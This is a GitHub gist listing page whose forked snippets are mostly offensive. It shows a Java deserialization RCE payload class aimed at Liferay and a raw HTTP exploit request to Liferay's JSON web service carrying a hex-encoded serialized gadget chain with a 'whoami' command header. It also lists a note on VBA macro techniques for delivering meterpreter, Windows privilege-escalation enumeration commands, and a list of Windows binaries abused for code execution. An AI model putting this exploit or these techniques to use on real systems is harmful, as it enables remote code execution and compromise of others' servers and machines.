Skip to content

Instantly share code, notes, and snippets.

View curiositysec's full-sized avatar

curiositysec

2 followers · 0 following
View GitHub Profile
@curiositysec
curiositysec / LiferayJsonEvalCC6.java
Created March 30, 2020 13:36 — forked from testanull/LiferayJsonEvalCC6.java
Liferay Json Deserialize 1 hit RCE
package ysoserial.payloads;
import com.mchange.lang.ByteUtils;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;
import ysoserial.payloads.annotation.Authors;
@curiositysec
curiositysec / LiferayRce.txt
Created March 30, 2020 13:36 — forked from testanull/LiferayRce.txt
POST /api/jsonws/invoke HTTP/1.1
Host: <Host>
Connection: close
cmd2: whoami
Content-Type: application/x-www-form-urlencoded
Content-Length: 4912
cmd={"/expandocolumn/update-column":{}}&p_auth=<valid token>&formDate=<date>&columnId=123&name=asdasd&type=1&defaultData:com.mchange.v2.c3p0.WrapperConnectionPoolDataSource={"userOverridesAsString":"HexAsciiSerializedMap:ACED0005737200116A6176612E7574696C2E48617368536574BA44859596B8B7340300007870770C000000023F40000000000001737200346F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6B657976616C75652E546965644D6170456E7472798AADD29B39C11FDB0200024C00036B65797400124C6A6176612F6C616E672F4F626A6563743B4C00036D617074000F4C6A6176612F7574696C2F4D61703B7870740003666F6F7372002A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6D61702E4C617A794D61706EE594829E7910940300014C0007666163746F727974002C4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E73
@curiositysec
curiositysec / Various-Macro-Based-RCEs.md
Created June 5, 2018 09:41 — forked from mgeeky/Various-Macro-Based-RCEs.md
Various Visual Basic Macros-based Remote Code Execution techniques to get your meterpreter invoked on the infected machine.

This is a note for myself describing various Visual Basic macros construction strategies that could be used for remote code execution via malicious Document vector. Nothing new or fancy here, just a list of techniques, tools and scripts collected in one place for a quick glimpse of an eye before setting a payload.

All of the below examples had been generated for using as a remote address: 192.168.56.101.

List:

  1. Page substiution macro for luring user to click Enable Content
  2. The Unicorn Powershell based payload
@curiositysec
curiositysec / web-servers.md
Created March 9, 2018 13:22 — forked from willurd/web-servers.md
Big list of http static server one-liners

Each of these commands will run an ad hoc http static server in your current (or specified) directory, available at http://localhost:8000. Use this power wisely.

Discussion on reddit.

Python 2.x

$ python -m SimpleHTTPServer 8000
@curiositysec
curiositysec / windows_privesc
Created February 13, 2018 09:02 — forked from sckalath/windows_privesc
Windows Privilege Escalation
// What system are we connected to?
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
// Get the hostname and username (if available)
hostname
echo %username%
// Get users
net users
net user [username]
@curiositysec
curiositysec / gist:cb4360c9e15a625be3252fb058c1d19e
Created November 10, 2017 13:11 — forked from trustedsec/gist:686057a1b8cdf3e580c57b211b263abe
List of applications for code execution via legit binaries
Rundll32.exe
Regsvr32.exe
Mshta.exe
Msbuild.exe
Cbd.exe
Csc.exe
Tracker.exe
Ntsd.exe
Bginfo.exe
Kd.exe